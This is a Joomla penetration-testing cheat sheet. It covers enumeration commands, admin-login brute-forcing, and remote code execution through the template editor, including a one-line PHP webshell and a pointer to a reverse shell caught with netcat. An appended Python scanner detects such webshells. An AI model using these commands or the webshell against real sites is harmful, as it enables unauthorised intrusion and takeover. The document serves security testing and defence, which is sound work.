Joomla
Joomla is a powerful open-source content management system (CMS) used for building websites and online applications. It offers extensive customization through templates and extensions, making it suitable for blogs, business sites, e-commerce, and social networking. Known for its flexibility and strong user management system, Joomla is a popular choice among developers and businesses.
Tech Stack of Joomla
- Backend: PHP
- Frontend: HTML, CSS, JavaScript (jQuery, Bootstrap)
- Database: MySQL, MariaDB, or PostgreSQL
- Server: Apache, Nginx, or IIS
File Structure
/joomla-root
│── administrator/ # Core admin dashboard files
│── components/ # Core and third-party components (extend Joomla functionality)
│── modules/ # Site modules (display additional content and features)
│── plugins/ # Installed plugins (can be exploited if outdated)
│── templates/ # Installed templates (controls site design and layout)
│── media/ # Media uploads (potential risk for malicious file uploads)
│── libraries/ # Joomla framework and helper classes
│── language/ # Language files for multilingual support
│── includes/ # Core Joomla functions and libraries
│── configuration.php # Database credentials & security settings (critical target for attackers)
│── index.php # Main entry point of Joomla
│── htaccess.txt # Default web server configuration (must be renamed to .htaccess)
│── robots.txt # Controls search engine crawling behavior
│── cli/ # Command-line scripts for Joomla maintenance
│── installation/ # Installation scripts (should be removed after setup)
│── logs/ # System logs (useful for debugging but can expose info)
│── tmp/ # Temporary files (can be abused if not secured properly)
│── LICENSE.txt # Joomla license information
│── README.txt # Default file that may expose version info (security risk)
Enumeration
## Verify if the site is running Joomla
curl -s http://blog.rezydev.xyz/ | grep Joomla
## Note: Check 'robots.txt'; its default contents reveal that this is a Joomla site
## Note: Check 'README.txt' in the root directory, which also exposes the major version
## Fingerprint Joomla Versions using xml file
curl -s http://blog.rezydev.xyz/administrator/manifests/files/joomla.xml
## Even the file 'plugins/system/cache/cache.xml' can reveal some info
## https://github.com/SamJoan/droopescan
## Note: This tool also supports SilverStripe, WordPress, and Drupal; Joomla and
## Moodle support is limited.
# Help Menu
droopescan scan --help
## Scan Joomla Site
droopescan scan joomla --url http://blog.rezydev.xyz/
## https://github.com/drego85/JoomlaScan
## Note: Requires python 2.7
## REQUIRED DEPENDENCIES
python2.7 -m pip install urllib3
python2.7 -m pip install certifi
python2.7 -m pip install bs4
## Enumerate
python2.7 joomlascan.py -u http://blog.rezydev.xyz/
Exploitation
## Bruteforce Admin Login Page
## https://github.com/ajnik/joomla-bruteforce
python3 joomla-brute.py -u http://blog.rezydev.xyz/ -w /opt/metasploit-framework/embedded/framework/data/wordlists/http_default_pass.txt --username admin
RCE with Template Editor (Requires Admin Permissions)
The Joomla Template Editor (System > Templates > Site Templates) allows modifying PHP files directly from the admin panel. An attacker with administrator privileges or compromised admin credentials can inject malicious PHP code into a template file to gain Remote Code Execution (RCE).
Exploitation Steps
- Login to Joomla as an administrator.
- Navigate to System > Templates > Site Templates.
- Select an active template and edit a file such as index.php or error.php, then insert:
<?php system($_GET['cmd']); ?> ## OR pentestmonkey/php-reverse-shell
- Execute commands via:
http://blog.rezydev.xyz/templates/template-name/error.php?cmd=whoami
http://blog.rezydev.xyz/templates/template-name/error.php ## just visit this URL if a
## reverse-shell script was inserted, and catch the shell using netcat
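From the defender's side, the template-editor technique above leaves a PHP file in templates/ that feeds request parameters into a command-execution function. The following scanner is an added example, not part of the original cheat sheet: it flags that pattern line by line and reports template files whose SHA-256 differs from a known-good baseline (the indicator regexes and the baseline format are assumptions of this example).

```python
"""Detect webshell-style edits in Joomla template PHP files (added defensive example)."""
import hashlib
import re
from pathlib import Path

# Execution sinks and request-controlled sources (assumed indicator set, not exhaustive).
SINK_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE,
)
SOURCE_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")
# Strings typical of dropped reverse-shell scripts.
REVERSE_SHELL_RE = re.compile(r"fsockopen\s*\(|/bin/sh\s+-i|pentestmonkey", re.IGNORECASE)


def find_suspicious_php(source: str) -> list:
    """Return (line_no, reason) for lines that look like an injected shell.

    Heuristic: a sink and a request source on the same line, or a reverse-shell marker.
    """
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if SINK_RE.search(line) and SOURCE_RE.search(line):
            findings.append((no, "execution sink fed by request input"))
        elif REVERSE_SHELL_RE.search(line):
            findings.append((no, "reverse-shell indicator"))
    return findings


def scan_templates(templates_dir: Path, baseline: dict) -> dict:
    """Scan every .php under templates_dir.

    baseline maps a POSIX-style relative path to its known-good sha256 hex digest
    (constructed by the site owner after a clean install or update).
    Returns {relative_path: [reasons]} for files that need attention.
    """
    report = {}
    for php in sorted(templates_dir.rglob("*.php")):
        rel = php.relative_to(templates_dir).as_posix()
        digest = hashlib.sha256(php.read_bytes()).hexdigest()
        reasons = [r for _, r in find_suspicious_php(php.read_text(errors="replace"))]
        if rel not in baseline:
            reasons.append("file not in baseline")
        elif baseline[rel] != digest:
            reasons.append("hash differs from baseline")
        if reasons:
            report[rel] = reasons
    return report
```

Run scan_templates(Path("/joomla-root/templates"), baseline) from cron or a file-integrity job; any hit on error.php or index.php that is not explained by a template update deserves an incident ticket.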